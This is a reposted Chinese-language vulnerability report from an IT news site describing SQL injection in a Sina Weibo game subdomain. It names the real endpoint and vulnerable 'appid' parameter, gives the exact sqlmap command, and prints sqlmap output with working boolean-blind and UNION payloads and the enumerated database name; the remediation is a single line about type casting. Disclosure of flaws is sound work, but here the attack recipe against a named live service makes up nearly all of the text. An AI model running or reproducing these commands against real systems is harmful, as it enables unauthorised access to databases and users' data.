IT学习网 - 爱学习 - 最具影响力综合资讯网站 -- 中国IT界的领航者!
热门关键字:      88888  as  xxx
站外
广告
站外
广告

新浪微博某分站存在SQL注入(可UNION)

发布时间:2016-09-07 17:22文章来源:互联网文章作者: 佚名点击次数:
新浪微博某分站存在SQL注入(可UNION) # 网站 http://game.weibo.com # 注入点,参数appid http://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1appid=3031123572_=1464667300888 python sqlmap.py -u http://game.weibo.com/webgame/

新浪微博某分站存在SQL注入(可UNION)

# 网站

http://game.weibo.com

# 注入点,参数appid

http://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888

python sqlmap.py -u "http://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888" -p appid --dbs

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: appid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: callback=callback1&appid=3031123572' AND 5987=5987 AND 'EGPq'='EGPq&_=1464667300888

    Type: UNION query
    Title: MySQL UNION query (80) - 13 columns
    Payload: callback=callback1&appid=3031123572' UNION ALL SELECT 80,80,80,80,80,80,CONCAT(0x71787a7171,0x4f6b476570785a737754,0x716b706a71),80,80,80,80,80,80#&_=1464667300888
---
[22:02:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5

available databases [1]:
[*] app_vgwebgame

解决方案:

强制类型转换


新浪微博某分站存在SQL注入(可UNION)
本文由 IT学习网 整理,转载请注明“转自IT学习网”,并附上链接。
原文链接:http://www.ourlove520.com/Article/netsafe/Website/445468.html

标签分类:

上一篇:上一篇:赶集网某系统弱口令
下一篇: 下一篇:看我如何1块钱买价值3999块钱的嗨镜(京东众筹破2百万)支付漏洞
无觅关联推荐,快速提升流量